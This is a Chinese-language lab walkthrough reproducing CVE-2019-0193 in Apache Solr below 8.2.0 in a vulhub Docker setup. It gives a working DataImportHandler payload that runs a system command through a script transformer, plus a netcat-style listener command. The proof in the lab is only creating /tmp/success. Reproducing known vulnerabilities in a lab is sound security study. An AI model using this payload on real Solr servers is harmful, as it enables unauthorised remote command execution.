前言
影響版本
Apache Solr < 8.2.0
環境搭建
啓動docker
systemctl start docker
獲取vulhub
git clone --depth=1 https://github.com.cnpmjs.org/vulhub/vulhub.git
進入對應目錄
cd vulhub/solr/CVE-2019-0193/
啓動容器
docker-compose up -d
docker-compose exec solr bash bin/solr create_core -c test -d example/example-DIH/solr/db # 創建名爲“test”的Core,並開啓dataimport
查看容器
docker ps
漏洞復現
centos啓動監聽
nv -lvvp 80
訪問
http://192.168.164.162:8983/solr/#/
打開剛剛創建好的test核心,選擇Dataimport功能並選擇debug模式,填入以下POC
<dataConfig>
<dataSource type="URLDataSource"/>
<script><![CDATA[
function poc(){ java.lang.Runtime.getRuntime().exec("touch /tmp/success");
}
]]></script>
<document>
<entity name="stackoverflow"
url="https://stackoverflow.com/feeds/tag/solr"
processor="XPathEntityProcessor"
forEach="/feed"
transformer="script:poc" />
</document>
</dataConfig>
點擊Execute with this Confuguration
查看生成文件
docker exec -it 939 /bin/bash
ls /tmp
參考文章
https://vulhub.org/#/environments/solr/CVE-2019-0193/
https://mp.weixin.qq.com/s/hCLEfDpXfDDWTTDd6vgtVA